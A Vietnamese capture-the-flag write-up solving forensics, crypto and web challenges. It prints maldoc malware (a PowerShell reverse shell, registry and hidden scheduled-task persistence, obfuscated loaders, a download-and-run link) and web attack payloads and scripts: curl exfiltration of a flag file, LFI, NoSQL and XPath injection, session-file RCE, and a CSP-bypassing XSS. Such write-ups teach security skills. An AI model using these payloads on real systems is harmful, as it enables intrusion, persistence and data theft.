EAdABoACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXAAkACgAJAByAGUAZwBwACkAIgAgAC0A'b'TgBhAG0AZ'b'QAgACIAJAAoACQAcgBlAGcAbgApACIAIAAtAGUAYQAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAOwAKAAoACgBpAGYAIAAoACQAaQBuAHMAdABh'b'AGwAbABlAGQA'b'KQAgAHsACgAKAAoAIAAgACAAIABpAGYAIAAoACQAaQBuAHMAdABhAGwAbABlAGQAIAAtAG4AZQAgACQAcABhAHkAbABvAGEAZABCAGEAcwBlADYANAApACAA'b'ewAKACAAIAAgACAAIAAgACAAIABTAGUAdAAtAEkAdA'b'BlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXAAk'b'ACgAJAByAGUAZwBwACkAIgAgAC0ATgBhAG'b'0AZQAgACIAJAAoACQAcgBlAGcAbgApACIAIAAtAEYAbwByAGMAZQAgAC0AVgBhAGwAdQBlACAAJABwAGEAeQBsAG8AYQBkAEIA'b'YQBzAGUANgA0ADsACgAgACAAIAAgAH0ACgAKACMAIABpAG4AcwB0AGEAbABsAGEAdABpAG8AbgAKAH0AIABlAGwAcwBlACAAewAKACAAIAAgACAACgAKACAAIAAgACA'b'AaQBm'b'ACAAKAAkAEYAQQBMAFMARQAgAC0AZQBxACAAKABUAGUAcwB0AC0AUABhAHQAaA'b'AgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAJAAoACQA'b'cgBlAGcAcAApAFwAIgApACkAIAB7AAoAIAAgACAAIAAgACAAIAAgAE4AZQ'b'B3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBl'b'AFwAJAAoACQAcgBlAGcAcAApACIAOwAKACAAIAAgACAAfQAKACAAIAAgACAAUw'b'BlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMA'b'VQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAJAAoACQA'b'cgBlAGcAcAApACIAIAAtAE4AYQBtAGUAIAAiACQAKAAkAHIAZQBnAG4AKQAiACAALQBGAG8AcgBjAGUAIAAtAFYAYQBs'b'AHUAZQAgACQAcABhAHkAbABvAGEAZABCAGEAcwBlADYANAA7AAoAIAAg'b'ACAAIAAKACAAIAAgACAACgAgACAAIAAgACQAdQAgAD0AIABbAEUAbgB2AGkAcgBvAG4AbQBlAG4A'"uejdkidq = "b'dABdADoAOgBVAHMAZQByAE4AYQBtAGUAOwAKACAAIAAgACAACgAgACAAIAAgAAoAIAAgACAAIAAkAHQAYQBzAGsAIAA9ACAARwBlAHQALQBTAGMAaABlAGQAdQBsAGUAZ'b'ABU'b'AGEAcwBrACAALQBUAGEAcwBrAE4AYQBtAGUAIAAiACQAKAAkAHIAZQBnAHAAKQAkACg'b'AJAByAGUAZwBuACkAIgAgAC0AZQBhACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQA'b'aQBuAHUAZQA7AAoAIAAgACAAIABpAGYAIAAoACQAdABhAHMAawApACAAewAKACAAIAA'b'gACAAIAAgACAAIABVAG4AcgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABl'b'AGQAVABhAHMAawAgAC0AVABhAHMAawBOAGE'b'AbQBlACAAIgAkACgAJAByAGUAZwBwACkAJAAoACQAcgBlAGcAbgApACIAIAAtAEMAbwBuAGYAaQByAG0AOgAkAGYAYQBsAHMA'b'ZQA7AAoAIAAgACAAIAB9AAoAIAAgACAAIAAKACAAIAAgACAACgAgACAAIAAgACQAYQAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQ'b'AYQBzAGsAQQBjAHQAaQBv'b'AG4AIAAtAEUAeABlAGMAdQB0AGUAIAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAiACAAIgAtAHcAIABoAGkAZABkAGU'b'AbgAgAC0ARQB4AGUAYwB1AHQAaQBvAG4A'b'UABvAGw'b'AaQBjAHkAIABCAHkAcABhAHMAcwAgAC0AbgBvAHAAIAAtAE4AbwBFAHgAaQB0ACAALQBDACAAVwByAGkAdABlAC0AaABvAHMAdAAgACcAVwBpAG4AZABvAHcAcwAg'b'AHUAcA'b'BkAGEAdABlACAAcgBlAGEAZAB5ACcAOwAgAGkAZQB4ACAAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4A'b'RwBlAHQ'b'AUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABHAGUAdAAt'b'AEkAdABlAG0AUAByAG8AcABlAHIAdAB5AC'b'AASABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAJAAoACQAcgBlAGcAcAApACkALgAkACgAJAByAGUAZwBuACkAKQApACkA'b'OwAiADsACgAgACAAIAAgACQAdAAgAD0AIABOAGUAdwAtAFMAYwBoA'b'GUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AEwAbwBnAE8AbgAgAC0AVQBz'b'AGUAcgAgACIAJAAoACQAdQApACIAOwA'b'KACAAIAAgACAAJABwACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBQAHIAaQBuAGMAaQBwAGEAbAAgACIA'b'JAAoACQAdQApACIAOwAKACAAIAAgACAAJABzACAAPQAgAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0A'b'GkAbgBnAHMAUwBlAHQAIAAtAEgAaQBk'b'AGQAZQBuADsA'b'CgAgACAAIAAgACQAZAAgAD0AIABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAJABhACAALQBUAHIAaQBnAGcA'b'ZQByACAAJAB0ACAALQBQAHIAaQBuAGMAaQBwAGEAbAAgACQAcAAgAC0AUwBlAHQAdABpAG4AZwBzACAAJABzADsACgAgACAAIAAgAFIAZQBnAGkAcwB0AGUAcgAtAFM'b'AYwBo'b'AGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAiACQAKAAkAHIAZQBnAHAAKQAkACgAJAByAGUAZ'b'wBuACkAIgAgAC0ASQBuAHAAdQB0AE8AYgBqAGUAYwB0ACAAJABkADsACgB9AAoA'b'CgAKAGkAZQB4ACAAKAB'b'bAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBz'b'AHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEI'b'AYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABwAGEAeQBsAG8AYQBkAEIAYQBzAGUANgA0ACkAKQApADsACgAKAA=='"x = Shell(odsuozldxufm("50b'OWERSHELL.ex'b'e -noexit -w hidd'b'en -enc '") & bomazpcuwhstlcd & dbcsmjrdsqm & gxiwcxqzqi & uejdkidq, 1)End Function...skipping 1 linePrivate Function odsuozldxufm(ByVal gwndcowqyulk As String) As StringDim cjzkqjwvtdxr As LongFor cjzkqjwvtdxr = 1 To Len(gwndcowqyulk) Step 2odsuozldxufm = odsuozldxufm & Chr$(Val("&H" & Mid$(gwndcowqyulk, cjzkqjwvtdxr, 2)))Next cjzkqjwvtdxrEnd Function..........
. ( $PshomE[4]+$pshoMe[30]+'x') ( [strinG]::join('' , ([REGeX]::MaTCHES( ")'x'+]31[DIlLeHs$+]1[DiLLehs$ (&| )43]RAhc[]GnIRTs[,'tXj'(eCALPER.)'$','wqi'(eCALPER.)';tX'+'jera_scodlam'+'{B'+'T'+'HCtXj '+'= p'+'gerwqi'(" ,'.' ,'R'+'iGHTtOl'+'eft' ) | FoREaCH-OBJecT {$_.VALUE} )) )$payloadBase64 = "JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADYALgAyADMAMwAzAC4ANQA0AC4AMgAiACwANAA0ADQANAApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==";//$payloadBase64 = "$client = New-Object System.Net.Sockets.TCPClient("196.2333.54.2",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"SEt ("G8"+"h") ( " ) )63]Rahc[,'raZ'EcalPeR- 43]Rahc[,)05]Rahc[+87]Rahc[+94]Rahc[( eCAlpERc- )';2'+'N'+'1'+'}atem_we'+'n_eht'+'_2N1 = n'+'gerr'+'aZ'(( ( )''niOj-'x'+]3,1[)(GNirTSot.EcNereFeRpEsOBREv$ ( . " ) ;-jOIn ( lS ("VAR"+"IaB"+"LE:g"+"8H") ).VALue[ - 1.. - ( ( lS ("VAR"+"IaB"+"LE:g"+"8H") ).VALue.LengtH)] | IeX Add-Type -Name Window -Namespace Console -MemberDefinition '[DllImport("Kernel32.dll")]public static extern IntPtr GetConsoleWindow();[DllImport("user32.dll")]public static extern bool ShowWindow(IntPtr hWnd, Int32 nCmdShow);';[Console.Window]::ShowWindow([Console.Window]::GetConsoleWindow(), 0);if ($payloadBase64 -match "http:|https:") {  $payloadBase64 = (New-Object "Net.Webclient").DownloadString($payloadBase64);}$installed = Get-ItemProperty -Path "HKCU:\Software\$($regp)" -Name "$($regn)" -ea SilentlyContinue;if ($installed) {  if ($installed -ne $payloadBase64) {    Set-ItemProperty -Path "HKCU:\Software\$($regp)" -Name "$($regn)" -Force -Value $payloadBase64;  }# installation} else {  if ($FALSE -eq (Test-Path -Path "HKCU:\Software\$($regp)\")) {    New-Item -Path "HKCU:\Software\$($regp)";  }  Set-ItemProperty -Path "HKCU:\Software\$($regp)" -Name "$($regn)" -Force -Value $payloadBase64;  $u = [Environment]::UserName;  $task = Get-ScheduledTask -TaskName "$($regp)$($regn)" -ea SilentlyContinue;  if ($task) {    Unregister-ScheduledTask -TaskName "$($regp)$($regn)" -Confirm:$false;  }  $a = New-ScheduledTaskAction -Execute "powershell.exe" "-w hidden -ExecutionPolicy Bypass -nop -NoExit -C Write-host 'Windows update ready'; iex ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software\$($regp)).$($regn))));";  $t = New-ScheduledTaskTrigger -AtLogOn -User "$($u)";  $p = New-ScheduledTaskPrincipal "$($u)";  $s = New-ScheduledTaskSettingsSet -Hidden;  $d = New-ScheduledTask -Action $a -Trigger $t -Principal $p -Settings $s;  Register-ScheduledTask "$($regp)$($regn)" -InputObject $d;}iex ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($payloadBase64)));
. ( $PshomE[4]+$pshoMe[30]+'x') ( [strinG]::join('' , ([REGeX]::MaTCHES( ")'x'+]31[DIlLeHs$+]1[DiLLehs$ (&| )43]RAhc[]GnIRTs[,'tXj'(eCALPER.)'$','wqi'(eCALPER.)';tX'+'jera_scodlam'+'{B'+'T'+'HCtXj '+'= p'+'gerwqi'(" ,'.' ,'R'+'iGHTtOl'+'eft' ) | FoREaCH-OBJecT {$_.VALUE} )) )

image

image

('iqwreg'+'p ='+' jXtCH'+'T'+'B{'+'maldocs_arej'+'Xt;').REPLACe('iqw','$').REPLACe('jXt',[sTRInG][chAR]34) |&( $sheLLiD[1]+$sHeLlID[13]+'x')

image

So we got the flag: CHTB{maldocs_are_the_new_meta}

4.AlienPhish

forensics_alienphish.zip

image

image

┌──(kali㉿kali)-[~/Desktop/HTB/AlienPhise]└─$ unzip Alien\ Weaknesses.pptxArchive: Alien Weaknesses.pptx inflating: [Content_Types].xml inflating: _rels/.rels inflating: ppt/slides/_rels/slide1.xml.rels inflating: ppt/_rels/presentation.xml.rels inflating: ppt/presentation.xml inflating: ppt/slides/slide1.xml inflating: ppt/slideLayouts/_rels/slideLayout5.xml.rels inflating: ppt/slideLayouts/_rels/slideLayout8.xml.rels inflating: ppt/slideLayouts/_rels/slideLayout10.xml.rels inflating: ppt/slideLayouts/_rels/slideLayout11.xml.rels inflating: ppt/slideLayouts/_rels/slideLayout9.xml.rels inflating: ppt/slideLayouts/_rels/slideLayout6.xml.rels inflating: ppt/slideMasters/_rels/slideMaster1.xml.rels inflating: ppt/slideLayouts/_rels/slideLayout1.xml.rels inflating: ppt/slideLayouts/_rels/slideLayout2.xml.rels inflating: ppt/slideLayouts/_rels/slideLayout3.xml.rels inflating: ppt/slideLayouts/_rels/slideLayout7.xml.rels inflating: ppt/slideLayouts/slideLayout11.xml inflating: ppt/slideLayouts/slideLayout10.xml inflating: ppt/slideLayouts/slideLayout3.xml inflating: ppt/slideLayouts/slideLayout2.xml inflating: ppt/slideLayouts/slideLayout1.xml inflating: ppt/slideMasters/slideMaster1.xml inflating: ppt/slideLayouts/slideLayout4.xml inflating: ppt/slideLayouts/slideLayout5.xml inflating: ppt/slideLayouts/slideLayout6.xml inflating: ppt/slideLayouts/slideLayout7.xml inflating: ppt/slideLayouts/slideLayout8.xml inflating: ppt/slideLayouts/slideLayout9.xml inflating: ppt/slideLayouts/_rels/slideLayout4.xml.rels inflating: ppt/theme/theme1.xml extracting: ppt/media/image1.png extracting: ppt/media/image2.png extracting: docProps/thumbnail.jpeg inflating: ppt/presProps.xml inflating: ppt/tableStyles.xml inflating: ppt/viewProps.xml inflating: docProps/app.xml inflating: docProps/core.xml
┌──(kali㉿kali)-[~/…/AlienPhise/ppt/slides/_rels]└─$ strings slide1.xml.rels<?xml version="1.0" encoding="UTF-8" standalone="yes"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="cmd.exe%20/V:ON/C%22set%20yM=%22o$%20eliftuo-%20exe.x/neila.htraeyortsed/:ptth%20rwi%20;'exe.99zP_MHMyNGNt9FM391ZOlGSzFDSwtnQUh0Q'%20+%20pmet:vne$%20=%20o$%22%20c-%20llehsrewop&&for%20/L%20%25X%20in%20(122;-1;0)do%20set%20kCX=!kCX!!yM:~%25X,1!&&if%20%25X%20leq%200%20call%20%25kCX:*kCX!=%25%22" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="cmd.exe" TargetMode="External"/></Relationships>
Target="cmd.exe%20/V:ON/C%22set%20yM=%22o$%20eliftuo-%20exe.x/neila.htraeyortsed/:ptth%20rwi%20;'exe.99zP_MHMyNGNt9FM391ZOlGSzFDSwtnQUh0Q'%20+%20pmet:vne$%20=%20o$%22%20c-%20llehsrewop&&for%20/L%20%25X%20in%20(122;-1;0)do%20set%20kCX=!kCX!!yM:~%25X,1!&&if%20%25X%20leq%200%20call%20%25kCX:*kCX!=%25%22"
neila -> alienhtraeyortsed -> destroyearthptth -> http
22%52%=!XCk*:XCk52%02%llac02%002%qel02%X52%02%fi;pma&;pma&!1,X52%~:My!!XCk!=XCk02%tes02%od)0;1-;221(02%ni02%X52%02%L/02%rof;pma&;pma&powershell02%-c02%22%$o02%=02%$env:temp02%+02%'Q0hUQntwSDFzSGlOZ193MF9tNGNyMHM_Pz99.exe';02%iwr02%http:/destroyearth.alien/x.exe02%-outfile02%$o22%=My02%tes22%C/NO:V/02%exe.dmc"=tegraT
>>> import base64>>> flag = "Q0hUQntwSDFzSGlOZ193MF9tNGNyMHM=">>> base64.b64decode(flag)b'CHTB{pH1sHiNg_w0_m4cr0s'

So we got the flag: CHTB{pH1sHiNg_w0_m4cr0s}

5.Low Energy Crypto

forensics_low_energy_crypto.zip

image

image

image

-----BEGIN PUBLIC KEY-----MGowDQYJKoZIhvcNAQEBBQADWQAwVgJBAKKPHxnmkWVC4fje7KMbWZf07zR10D0mB9fjj4tlGekPOW+f8JGzgYJRWboekcnZfiQrLRhA3REn1lUKkRAnUqAkCEQDL/3Li4l+RI2g0FqJvf3ff-----END PUBLIC KEY-----

image

image

┌──(kali㉿kali)-[~/Desktop/CTF/HTB/LowEnergyCrypto]└─$ cat ciphertext  9)i�▒�����^E����x�9��w��bm�@�9*����"�B���c��������pw��8                                              
┌──(kali㉿kali)-[~/Desktop/CTF/HTB/LowEnergyCrypto]└─$ openssl rsa -in ./publickey -text -inform PEM -pubinRSA Public-Key: (512 bit)Modulus:  00:a2:8f:1f:19:e6:91:65:42:e1:f8:de:ec:a3:1b:  59:97:f4:ef:34:75:d0:3d:26:07:d7:e3:8f:8b:65:  1a:43:ce:5b:e7:fc:24:6c:e0:60:94:56:6e:87:a4:  72:76:5f:89:0a:cb:46:10:37:44:49:f5:95:42:a4:  44:09:d4:a8:09Exponent:  00:cb:ff:72:e2:e2:5f:91:23:68:34:16:a2:6f:7f:  77:dfwriting RSA key-----BEGIN PUBLIC KEY-----MGowDQYJKoZIhvcNAQEBBQADWQAwVgJBAKKPHxnmkWVC4fje7KMbWZf07zR10D0mB9fjj4tlGkPOW+f8JGzgYJRWboekcnZfiQrLRhA3REn1lUKkRAnUqAkCEQDL/3Li4l+RI2g0FqJvf3ff-----END PUBLIC KEY-----
p = 92270847179792937622745249326651258492889546364106258880217519938223418249279q = 92270847179792937622745249326651258492889546364106258880217519938223418258871e = 271159649013582993327688821275872950239
──(kali㉿kali)-[~/Desktop/CTF/HTB/LowEnergyCrypto]└─$ python3 rsatool.py -p 92270847179792937622745249326651258492889546364106258880217519938223418249279 -q 92270847179792937622745249326651258492889546364106258880217519938223418258871 -e 271159649013582993327688821275872950239 -o private Using (p, q) to initialise RSA instancen =a28f1f19e6916542e1f8deeca31b5997f4ef3475d03d2607d7e38f8b651a43ce5be7fc246ce06094566e87a472765f890acb4610374449f59542a44409d4a809e = 271159649013582993327688821275872950239 (0xcbff72e2e25f9123683416a26f7f77df)d =587f5ba09f76fa1f56ddb4bcbe27a2c280f1fe2b51347253eba6b8cf8c53b5a4f524c5a7f1b3c3b2b0c0dd4f9541c7b7594522f1edc09f4d55914ca4a3c1828fp =cbff72e2e25f9123683416a26f7f77cb7199bbe424b9f138dc0dc130b3c2103fq =cbff72e2e25f9123683416a26f7f77cb7199bbe424b9f138dc0dc130b3c235b7Saving PEM as private┌──(kali㉿kali)-[~/Desktop/CTF/HTB/LowEnergyCrypto]└─$ cat private              -----BEGIN RSA PRIVATE KEY-----MIIBRwIBAAJBAKKPHxnmkWVC4fje7KMbWZf07zR10D0mB9fjj4tlGkPOW+f8JGzgYJRWboekcnZfiQrLRhA3REn1lUKkRAnUqAkCEQDL/3Li4l+RI2g0FqJvf3ffAkBYf1ugn3b6H1bdtLy+J6LCgPH+K1E0clPrprjPjFO1pPUkxafxs8OysMDdT5VBx7dZRSLx7cCfTVWRTKSjwYKPAiEAy/9y4uJfkSNoNBaib393y3GZu+QkufE43A3BMLPCED8CIQDL/3Li4l+RI2g0FqJvf3fLcZm75CS58TjcDcEws8I1twIgJXpkF+inPgZETjVKdec6UGg75ZwW3WTPEoVANux3DscCIDjx+RSYECVaraeGG2O/v8iKe6dn1GpMVGUuaKecISArAiA0QRYkZFB5D4BnOxGkMX3ihjn7NFPQ7+Jk/abWRRq6+w==-----END RSA PRIVATE KEY-----
┌──(kali㉿kali)-[~/Desktop/CTF/HTB/LowEnergyCrypto]└─$ openssl rsautl -decrypt -raw -inkey private -in ciphertext �5����p+wɹ�[R�.;���^�bs� �6yCHTB{5p34k_fr13nd_4nd_3n73r}

(Bài này kết thúc giải rồi mình mới ra do hơi gà về crypyo hehe)

So we got the flag: CHTB{5p34k_fr13nd_4nd_3n73r}

/HardWare/

1. Serial Log

image

hw_serial_logs.zip

Ngoài Reverse Engineer, Forensics nay mình kiếm thêm niềm vui mới với duy nhất 1 bài Hardware kk ?

image

image

image

image

image

image

image

image

image

/Web Exploitation/

1. Caas

Nhìn vào source code ta thấy, chall được code theo MCV

flag ở / và ta chỉ cần quan tâm tới 2 file đó là controllers và modelỞ controller

Có vẻ như đây là một bài command injection, nhân ip và gọi tới commandmodel

Nhìn vào model file thì đúng thật, sử dụng curl tới ip mà ta có thể control. với curl ta có một option để đọc file và gửi đi

from stackovervậy ta có thể đọc file flag ở root dir và gửi đi thôi. ez gameip=--data "@/flag" https://requestbin.io/15qgycy1

2. MiniSTRyplace

Tiếp tục download source về và đọc code ta để tìm điểm exploit

Ta thấy đây là một bài lfi đơn giản, chỉ filter ../ nhưng không đệ quy nên ta có thể sử dụng ....// để bypassflag ở root dir nên chỉ cần sử dụng payload sau để có flag

3. Wild Goose Hunt

Nhìn vào source code ta thấy,Có vẻ đây là một bài sqli, và mình không thấy flag ở đâu trong source nên mình đoán flag ở trong db hoặc có thể là password, app sử dụng mongo dbVới kinh nghiệm của mình thì đây có thể bị nosqlilets try$ne nghĩa là not equal, vậy tới đây mình sử dụng regex để brute passwordTới đây có thể viết 1 đoạn code ngắn để brute những chữ còn lại trong flagref: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection

4. E.Tree

Bài này chỉ cho mỗi file xmlNhằm nói cho chúng ta biết cấu trúc của thằng nàynothing! hmmmvì không có source nên mình phải fuzz để tìm ra thứ có ích cho mìnhgot it,mình thậm chí có thể đọc được code của hàm search luôn, nó sử dụng thư viện lxml để truy vấn xpath, vậy bài này có thể là xpath injectiontiếp tục fuzz kết hợp search gg về xpath injection mình tìm được một số payloadkhá giống với sqlitiếp tục thử cho tới khi mình tìm được payload sauừm huh{"search":"John Doe' or substring(//military/district[2]//selfDestructCode,1,1)='C"}flag chia làm 2 phần 1 ở district[2] và district[3] nên ta sẽ brute như blind sqli thôiscript sovlve

import requestsurl = "http://206.189.121.131:30353/api/search"headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0", "Accept": "*/*", "Accept-Language": "vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Referer": "http://206.189.121.131:30353/", "Content-Type": "application/json", "Origin": "http://206.189.121.131:30353", "DNT": "1", "Connection": "close"}flag="CHTB{"flag=""for i in range(1,30):  print(i)  for j in range(48,128):    #print(chr(j))    json={"search": f"x' or substring(//military/district[3]//selfDestructCode,{i},1)='{chr(j)}"}    #print(json)    r=requests.post(url, headers=headers, json=json)    if "This millitary staff member exists" in r.text:      flag+=chr(j)      print("flag:"+flag)      break

5. Extortion

Bài này thì không có source nhưng mình có thể dễ dàng fuzz ra được bài này bị gìlfi là rõ, nhưng lfi ở đây như thế nào?thử với f=n3mo

ta biết được cú pháp include của chall như sauinclude("files/".$_GET['f'])vậy ta không thể sử dụng bất kỳ schema nào ở để để đọc source :(,ngoài ra chall còn có một chức năng là send nhưng không biết send gì.mình đoán ngay nếu biết send.php làm gì thì sẽ win this chall nhưng tại thời điểm đó mình không fuzz ra được send.php làm gì.với những lfi mà không thể làm gì tiếp theo, mình mạnh dạn thửsession upload process

import sysimport stringimport requestsfrom base64 import b64encodefrom random import sample, randintfrom multiprocessing.dummy import Pool as ThreadPoolHOST = 'http://138.68.177.159:31640/'sess_name = '8ad468a3766fa95b2d489b7097dbbd55'headers = {  'Connection': 'close',   'Cookie': 'PHPSESSID=' + sess_name}payload = '<?php echo "n3mo123";?>'def runner1(i):  data = {    'PHP_SESSION_UPLOAD_PROGRESS': 'ZZ' + payload + 'Z'  }  i=0  while 1:    i+=1    if i%100==0:      print("try[+]:"+chr(i))    fp = open('/etc/passwd', 'rb')    r = requests.post(HOST, files={'f': fp}, data=data, headers=headers)    fp.close()def runner2(i):  filename = '../../../../../tmp/sess_' + sess_name  # print filename  while 1:    url = '%s?f=%s' % (HOST, filename)    r = requests.get(url, headers=headers)    c = r.text    if c and 'n3mo123' in c:      print(c)if sys.argv[1] == '1':  runner = runner1else:  runner = runner2pool = ThreadPool(32)result = pool.map_async( runner, range(32) ).get(0xffff)

oke it work, nhưng trong khi thử cách này thì mình nhận ra chức năng của send.php, send.php nhận đầu vào của mình và lưu vào session, simple hơn so với cách trên. nên mình sẽ đi theo hướng của author trươc.sau khi biết được chức năng của php là ghi vào session, mà session mặc định được lưu ở /tmp/sess_sessid, vậy mình có write file + include? ngại gì mà không RCE?send 2 request sauand got RCE => donecasch2: sử dụng script trên của mình để rce

6. The Galactic Times

bài này thì có source nên mình xác định được goal từ đầuxss bypass csp :vmình giải thích sơ về cách hoạt động của app như sau.mỗi lần mình submit feadback thì nó sẽ lưu vào db đồng thời gọi bot.ở route list ta thấy chỉ có thể access từ local hay nói cách khác chỉ bot mới có quyền access,bot access /list tức ta phải trigger xss ở đây.take a look to cspscript-src https://cdnjs.cloudflare.com/quen quá :vhttps://medium.com/@bhaveshthakur2015/content-security-policy-csp-bypass-techniques-e3fa475bfe5dsau khi chỉnh một chút để phù hợp với chall thì đây là payload cuối cùng của mình

<script src="https://cdnjs.cloudflare.com/ajax/libs/prototype/1.7.2/prototype.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.0.8/angular.js" /></script> <div ng-app ng-csp> {{ x = $on.curry.call().eval("fetch('/alien').then(function(response) {return response.text().then(function(text) {document.location='https://requestbin.io/1744lkl1?q='+btoa(unescape(encodeURIComponent(text.slice(0, text.length / 6))))});});") }} </div>

vì csp chặn không cho fetch ra bên ngoài, nên mình sẽ phải sử dụng document.location và hơn nữa content của file alien.html quá dài nên mình phải cắt bớt để phù hợp với độ dài ở url.

7. pcalc

với những người chơi ctf thường xuyên thì đọc đề biết ngay liên quan tới evalvới source được cấpmình sẽ tập trung focus chủ yếu vào đây.thấy tối đa 100 char, đồng thời không được sử dụng a-z'"đọc tới đây mình biết cách giải luôn là sử dụng ~call được phpinfo thì call được system? right?không hiểu sao khi sử dụng payload này thì mình lại không work, nên mình quyết định xài no space bằng toán tử $IFS thì workpayload cuối(~%8C%86%8C%8B%9A%92)(~%9C%9E%8B%DB%84%B6%B9%AC%82%D0%D5)với những bài eval vơi blacklist lỏng lẻo như thế này thì mình nghĩ sẽ có nhiều hướng, hướng tiếp theo mình gợi ý là sử dụng blacktic cộng với octasử dụng blacktic kết hợp với eval để chạy thẳng bash cmd ở đây.

8. emoji voting

